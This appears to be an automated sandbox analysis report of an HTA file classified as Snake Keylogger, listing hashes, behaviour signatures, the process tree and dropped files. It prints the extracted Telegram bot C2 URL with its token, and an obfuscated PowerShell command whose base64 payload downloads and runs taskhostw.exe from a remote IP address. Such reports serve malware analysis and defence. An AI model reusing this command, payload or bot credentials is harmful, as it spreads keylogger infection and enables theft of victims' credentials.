Analysis

  • max time kernel
    240s
  • max time network
    243s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    16/10/2024, 01:40

General

  • Target

    16102024_0140_niceworkingprojectforeveryone.hta

  • Size

    165KB

  • MD5

    44ad3c49b38f4f6f1739baf86d528fd3

  • SHA1

    afcf27df0ee2373846a1f6b8027e9cfcea77c486

  • SHA256

    4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368

  • SHA512

    e2846bdafad1f3f2901171d3e3ca5744cd934ec6231bcef14327e17a8ac2aa225e254d25e1abca4a3465994979fa480b8f8a90be21754bb7a8f457d68102f691

  • SSDEEP

    96:Ea+n7bJh/qUh/qoR3hH+TJoAj/h/q9+SAT:Ea+7bJ5/pLA78WT

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16102024_0140_niceworkingprojectforeveryone.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2528
    • C:\Windows\SysWOW64\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE
      "C:\Windows\sysTeM32\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE" "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58+'frOmbase64striNG('+[cHar]34+'JHhzZ1dMTGJ3cHcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVSREVGSU5JdElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxR0Fnd2p0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbG9VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdnVEaE5SWGRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmtGUlVRQWIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS2NkY3VuVHoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTE1URWdJVnBORyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhzZ1dMTGJ3cHc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNS8yNzAvdGFza2hvc3R3LmV4ZSIsIiRFTlY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1N0YVJ0LVNMRUVwKDMpO1NUYXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2316
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2824
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a3erzvzu.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8602.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8601.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2772
      • C:\Users\Admin\AppData\Roaming\taskhostw.exe
        "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2440

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\RES8602.tmp

          Filesize

          1KB

          MD5

          95620a347d51db77f4a5c57a6b1b840e

          SHA1

          6d7f9ef008c97b0a20d1411a446bfe14e2abb81c

          SHA256

          6562885a0315b918541689be9239a14fd4c44e3d53a5b544bce398682680fe5f

          SHA512

          a9edb4bb78916cd394946f73a8dbea798ac1fb3063df84dcbf97b341778445b438a303d8ed70f5ff3eb350e57cbef2731315b70d6b5ddaec70bfc10d62898224

        • C:\Users\Admin\AppData\Local\Temp\a3erzvzu.dll

          Filesize

          3KB

          MD5

          5c337f847566d92b9f38ce0f4c0cc8f3

          SHA1

          8ba8640810bbdfa72f02b1e55737bfffab49203a

          SHA256

          4a0a9201c590012f7a8e38cd42c220853f573c219fe48bea13aee7782cb92312

          SHA512

          b6adb63b0f933c3d408e99e591117e4926183276a923ad2428ce12d53f08824a338650046d2c35803b182da7a83a83b6f6df8f5b0b23491029269de7ba588557

        • C:\Users\Admin\AppData\Local\Temp\a3erzvzu.pdb

          Filesize

          7KB

          MD5

          2822de9663d6b2e4e0d911419c587a27

          SHA1

          6057202b17f53918cbc8efa925ed8d2cdd6723ea

          SHA256

          a79b6312d75f66ee9e5ccca0ea8b001f9db211c6d21c05fea9d4eb788fe7a67e

          SHA512

          3797e6161f4fdac62939385ed75e8384e3c1bae9ee5d06c2444f631f632fdc7d5d8a5a68be5d0cd1d1fc1ca782ea5ff302ad3e5e4ca3b3bb59c0bb03abf861a7

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

          Filesize

          7KB

          MD5

          aa159bd2e415cfd34e1f0815b05a246c

          SHA1

          a5076713116fa301c5f749a1b646a01db936a3b1

          SHA256

          ac7cdf7431b28953388ed21f99645cdc15ebe1efda468545a95876b0224e661f

          SHA512

          3f6e0f23ef4b3bc2201029efd0376ea9f8ed370ce8fcbc38d6171e33556c59fc5645618d88ed11f062c6f2158db67c4c1e40da382ae985dc6668eeb08d9d7b78

        • C:\Users\Admin\AppData\Roaming\taskhostw.exe

          Filesize

          948KB

          MD5

          3e2f27edd3deacd8f08f6ed1133b2040

          SHA1

          060e3218949c5a006bb8607e8228e6539b737bfb

          SHA256

          163a25e2b68ed09eb4cf82f28c87568969091764bdfb4140b4675a00e2d2ed86

          SHA512

          da437c39e3337f6750c3b9353c71999c16415ec1fecdaa4bba676bb12207cb51a7258b91b175d1893ae4e9111fa9ccf027151ad7527d9d78df59f86436cfdb42

        • \??\c:\Users\Admin\AppData\Local\Temp\CSC8601.tmp

          Filesize

          652B

          MD5

          b6578b91401729f486ddc70ef092c351

          SHA1

          9920c39989cf48f106a98a9092ede1816f90eff1

          SHA256

          bb0261b231cc16054f6cb81eee13f60aa45bd2040b2404b51f49860fae1e1d08

          SHA512

          72623414964a4862cbfd45fe27efd972458ba9ca3cc36b41894f08f3693acd246a51fcb7d003ed8a1d2a732df0d07a05457f4cffaeba3f02970eac549870c47b

        • \??\c:\Users\Admin\AppData\Local\Temp\a3erzvzu.0.cs

          Filesize

          475B

          MD5

          ecc2c10cb4c5954e2d5156bce54e41f4

          SHA1

          2d7cde31f9942c1dc80c493c03d675962991bf31

          SHA256

          21d7b2d886e9a8c3cf70d60b612151ecf35df156524dda00bc5f0c14df45b3ac

          SHA512

          bfce3f87e8f97f1a8f149c7f3e172e312019a4189fd1e33bdb7d2c617c6bbf41f548e91c12f71b5e8215397138ea643430f0ee87d72b33760c0dd2e3b8ae4d96

        • \??\c:\Users\Admin\AppData\Local\Temp\a3erzvzu.cmdline

          Filesize

          309B

          MD5

          a35aa4e335fdf2563f4fa23cf3d49f11

          SHA1

          62d90fa02d4a8a0a4952aa648ef61f296b09d6cf

          SHA256

          5507d350a25c56f0fb3b2ee88c8bb50a258f86ec4385fa70bf74fb5cad4dfa61

          SHA512

          53ff64f8ae3c4a605353ebb7de123c7468613b9afc31d5e09ad01d9022bd2fad3369e7026e3df128935059bd95f6e3607e94d3fb4227ea28d496b3010a256ed8

        • memory/2440-36-0x0000000000400000-0x0000000000426000-memory.dmp

          Filesize

          152KB

        • memory/2440-35-0x0000000000400000-0x0000000000426000-memory.dmp

          Filesize

          152KB

        • memory/2440-34-0x0000000000400000-0x0000000000426000-memory.dmp

          Filesize

          152KB